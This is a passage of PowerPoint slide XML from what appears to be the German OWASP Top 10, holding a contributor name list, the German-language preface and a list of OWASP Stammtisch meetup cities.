          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BUGemot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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CDAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Checkmarx</a:t>
            </a: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Colegio LaSalle Monteria</a:t>
            </a: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Company.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ContextIS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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Contrast Security</a:t>
            </a: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DDoS.com</a:t>
            </a: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Derek Weeks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Easybss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Edgescan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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EVRY</a:t>
            </a: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EZI</a:t>
            </a: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Hamed</a:t>
            </a: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Hidden</a:t>
            </a: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I4 Consulting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iBLISS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seguran̤a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intelig̻encia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ITsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Security Services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Khallagh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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Linden Lab</a:t>
            </a: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M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Limacher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dienstleistungen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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Micro Focus Fortify</a:t>
            </a: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Minded Security</a:t>
            </a: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National Center for Cyber Security Technology</a:t>
            </a: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Network Test Labs Inc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Osampa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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Paladion Networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Purpletalk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="95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Secure Network</a:t>
            </a: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Shape Security</a:t>
            </a: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SHCP</a:t>
            </a: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Softtek</a:t>
            </a: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Synopsys</a:t>
            </a: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TCS</a:t>
            </a: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Vantage Point</a:t>
            </a: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Veracode</a:t>
            </a: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Web.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110784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1504663470"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939601"/>
          <a:ext cx="6854400" cy="8967489"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="363489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Vorwort der deutschen Version</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1600" b="1" noProof="0"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200000">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t>„Ist es nicht sonderbar, dass eine wörtliche Übersetzung fast immer eine schlechte ist? Und doch lässt sich alles gut übersetzen. Man sieht hieraus, wie viel es sagen will, eine Sprache ganz verstehen; es heißt, das Volk ganz kennen, das sie spricht.“ (G.C. Lichtenberg, „Sudelbücher“, 1800-1806).</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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t>Die deutsche Version der OWASP Top 10 war genau das: eine Herausforderung, dem Ziel und dem Geist der Top 10 in deutscher Sprache gerecht zu werden. Hierbei wurden bei Bedarf auch kleinere Präzisierungen vorgenommen, die das Verständnis erleichtern. Wir verwenden daher bewusst nicht den Begriff „Übersetzung“, auch wenn es zu weiten Teilen genau das ist. Dinge ständig weiter zu treiben und kontinuierlich zu verbessern ist eben auch OWASP.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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t>Wir möchten Sie als Geschäftsführer, Manager, Anwendungs-Verantwortlicher, Prüfer oder Entwickler für Webanwendungssicherheit sensibilisieren und Ihnen den Einstieg in diese Thematik erleichtern.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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t>Dieses Dokument hilft Ihnen, eine neue Perspektive auf Ihre Anwendungen zu erhalten, um Sicherheitsfehler zu vermeiden und Risiken minimieren zu können. Einige englische Fachbegriffe wurden dabei beibehalten, weil sie auch im deutschen gebräuchlich sind.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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t>Wir wünschen Ihnen als Neueinsteiger oder Profi ein kurzweiliges Lesevergnügen und die (Bestätigung der) Erkenntnis, dass die Sicherheit ein kritischer Erfolgsfaktor für Webanwendungen ist.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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t>Fragen zur deutschen Version können Sie gerne direkt an top10@owasp.de senden.</a:t>
                      </a:r>
                      <a:b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br>
                      <a:b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b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t>Ihr deutschsprachiges Top 10-Team:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="de-DE" sz="95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endParaRPr lang="de-DE" sz="95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endParaRPr lang="de-DE" sz="95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endParaRPr lang="de-DE" sz="95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endParaRPr lang="de-DE" sz="95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600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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t>Das </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Pdf</a:t>
                      </a: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t> zur deutschen Version der OWASP Top 10 finden Sie unter </a:t>
                      </a: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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/Germany/Projekte/Top_10</a:t>
                      </a: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400">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de-DE" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Stammtisch-Initiative</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> des OWASP German</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Chapter</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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890284831"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1065600">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t>In mehreren deutschen Städten gibt es </a:t>
                      </a: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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP-Stammtische</a:t>
                      </a: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t>, bei denen man sich in lockerer Runde trifft, um sich auszutauschen, nette Leute kennenzulernen oder ernsthafte Sicherheitsthemen zu diskutieren – meistens mit Vortrag.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Aktive Stammtische gibt es (Stand November 2018) in </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" tooltip="OWASP German Chapter Stammtisch Initiative/Dresden"/>
                        </a:rPr>
                        <a:t>Dresden</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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50" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" tooltip="OWASP German Chapter Stammtisch Initiative/Frankfurt"/>
                        </a:rPr>
                        <a:t>Frankfurt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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50" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" tooltip="OWASP German Chapter Stammtisch Initiative/Hamburg"/>
                        </a:rPr>
                        <a:t>Hamburg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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50" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Heilbronn-Franken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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50" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10" tooltip="OWASP German Chapter Stammtisch Initiative/Karlsruhe"/>
                        </a:rPr>
                        <a:t>Karlsruhe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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50" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11" tooltip="OWASP German Chapter Stammtisch Initiative/Köln"/>
                        </a:rPr>
                        <a:t>Köln</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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50" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12" tooltip="OWASP German Chapter Stammtisch Initiative/München"/>
                        </a:rPr>
                        <a:t>München</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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50" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13" tooltip="OWASP German Chapter Stammtisch Initiative/Ruhrpott"/>
                        </a:rPr>
                        <a:t>Ruhrpott</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14" tooltip="OWASP German Chapter Stammtisch Initiative/Stuttgart"/>
                        </a:rPr>
                        <a:t>Stuttgart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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525440266"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Vorwort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>der</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>deutschen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Tabelle 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3031959426"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="289304" y="4207008"/>
          <a:ext cx="6052974" cy="1592580"/>
        </p:xfrm>
